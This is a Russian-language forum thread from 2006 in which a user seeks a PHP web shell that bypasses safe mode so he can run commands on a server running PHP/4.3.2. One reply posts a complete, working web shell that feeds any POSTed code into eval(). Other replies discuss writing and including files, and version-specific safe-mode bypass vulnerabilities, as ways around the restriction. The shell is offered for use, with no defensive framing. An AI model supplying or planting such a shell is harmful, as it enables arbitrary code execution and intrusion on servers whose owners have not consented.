php shell с обходом safe mod

Shanker

мастер

Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003

всего лишь человек...

Это нравится:0 Да/0 Нет

18.08.2006 04:47:28

Нужен скрипт, который выполняет shell-команды именно на php с обходом safe mod.

Кроме r57shell есть что-то стоящее?

"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

Furius Angel Guest	#2 Это нравится:0 Да/0 Нет 18.08.2006 11:41:54 Поищи в архиве ][акера. Скрипт не найдёшь - зато есть описания как это делается....

GreShNicK

Guest

Это нравится:0 Да/0 Нет

18.08.2006 20:25:08

<?php
$shell=get_magic_quotes_gpc();
if (!empty($_POST['code']) ) {
$code=$shell ? stripslashes($_POST['code']) : $_POST['code'];
} else {
$code=NULL;
}
echo"
Enter code to execute in php eval();
<form action='' method='POST'>
<textarea cols='80' rows='25' name='code' id='code'>
$code
</textarea>
<br>
<br>
<input type='submit' value='Execute'>
</form>
<br><hr><br> "
;
if (!is_null($code)) eval($code);
?>

Shanker мастер Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003 всего лишь человек...	#4 Это нравится:0 Да/0 Нет 19.08.2006 16:32:23 GreShNicK, php eval в safe mode не работает! "Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

Phoenix Guest	#5 Это нравится:0 Да/0 Нет 21.08.2006 18:28:10 ну пусть скрипт сздает фал в разрешенной директории, и incluide-ет его...

Shanker

мастер

Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003

всего лишь человек...

Это нравится:0 Да/0 Нет

21.08.2006 20:40:05

Phoenix,

это даст мне возможность читать файлы. А как насчёт остальных команд? Какие им альтарнативы?

"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

Furius Angel

Guest

Это нравится:0 Да/0 Нет

22.08.2006 07:28:41

Цитата
Furius Angel пишет: Поищи в архиве ][акера. Скрипт не найдёшь - зато есть описания как это делается....

Ещё раз повторяю... Там целая статья была.

Phoenix

Guest

Это нравится:0 Да/0 Нет

22.08.2006 13:11:27

Цитата
Shanker пишет: Phoenix, это даст мне возможность читать файлы. А как насчёт остальных команд? Какие им альтарнативы?

Это даст тебе ровно то что разрешено в сейфмоде.
Однако различные версии PHP имебют различные уязвимости обхода сейфмода... тт уже по врсии PHP смотреть надо...

Shanker

мастер

Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003

всего лишь человек...

Это нравится:0 Да/0 Нет

22.08.2006 21:01:50

Цитата
Furius Angel пишет: Ещё раз повторяю... Там целая статья была.

Не про это ли речь?
Смотрел я. Толку мало. Почти ничего не сработало. От r57 shell и то толку больше.

Вот кстати наткнулся на очень хорошую вещь - возможность листинга фйлов/папок: http://www.securitylab.ru/forum/read.php?FID=16&TID=21260&MID=209183&phrase_id=79748

Но всё-равно пока неясно как команды выполнять...

Цитата
Phoenix пишет: Однако различные версии PHP имебют различные уязвимости обхода сейфмода... тт уже по врсии PHP смотреть надо...

Да, видел, пролетают в багтраках сообщения. Но во-первых, они очень малоинформационные, а во-вторых я на php кодить не умею. Разве что самое примитивное сваяю... И более или менее глядя на код догоняю его суть интуитивно. Хотя, хорошая возможность изучить php...

На серваке стоит PHP/4.3.2

"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

Логин:
Пароль:
	Запомнить меня на этом компьютере

Забыли свой пароль?